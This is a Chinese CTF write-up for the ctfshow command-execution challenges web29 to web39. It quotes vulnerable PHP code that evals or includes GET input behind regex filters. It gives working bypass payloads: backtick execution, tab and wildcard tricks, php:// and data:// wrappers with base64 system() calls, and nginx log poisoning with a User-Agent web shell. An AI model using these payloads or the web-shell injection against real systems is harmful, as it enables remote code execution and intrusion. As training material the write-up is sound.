CTFSHOW-命令执行

web29 通配符绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
 
}else{
    highlight_file(__FILE__);
}

仅过滤flag字符,i表示不区分大小写。方法很多。(由于浏览器的html解析逻辑,会把php当成注释处理,所以一定要记得看html以保证看到的是真的返回)

1
?c=eval($_GET['d']);&d=echo `cat flag.php`;

web30 反引号执行系统命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
 
}else{
    highlight_file(__FILE__);
}

过滤flag|system|php,用`代替system即可。补充一些知识。

linux中的单引号、双引号和反引号的特性

单引号:会将其中内容都当做字符串,忽略所有命令和特殊字符

双引号:会解析其中的特殊字符和变量,如果要原样输出特殊字符需要用\转义

反引号:会将反引号中的字符串当作命令执行,反引号类似$(command)

web31 空格绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
 
}else{
    highlight_file(__FILE__);
}

这题把空格 和单引号’给过滤了,制表符%09可以代替空格。至于对cat,用more、less、/bin/ca*都是可以的。

1
?c=echo%09`/bin/ca*%09fla*`;

web32-36 文件包含+伪协议

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

文件包含(include/require)+伪协议读文件: 因为分号被过滤了,这里改用?>闭合。32-36相同playload。伪协议相关部分可以看看这篇文章:https://segmentfault.com/a/1190000018991087

1
2
3
4
# php伪协议
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
c=include$_GET[a]?>&a=data://text/palin,<?php system("tac flag.php");?>
c=include$_GET[a]?>&a=data://text/palin;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

33、在上一题基础上过滤了”

1
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c))

34、过滤了:

1
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c))

35、 过滤了<=

1
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c))

36、过滤了数值,将参数改为字母即可。

1
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c))

web37-38 伪协议|日志文件getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

include预编译,运用伪协议读取:

1
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==

也可以配合UA头进行日志文件包含,设置User-Agent: 一句话木马:可以看到用的是nginx。改包,把HOST换一下就好了,放过去之后蚁剑连上就行:

1
2
3
4
5
6
7
8
9
GET /?c=/var/log/nginx/access.log HTTP/1.1
Host: 8eb33014-6450-42ce-a300-148f42aa4b9a.challenge.ctf.show
User-Agent: <?php @eval($_POST['d']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

web39

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

可以用?>来闭合php代码,使得其后的.php会被当中普通的html字符直接显示在页面上 记得引号绕过正则过滤

1
?c=data://text/plain,<?= system("tac fla''g.php");?>

web40 无参RCE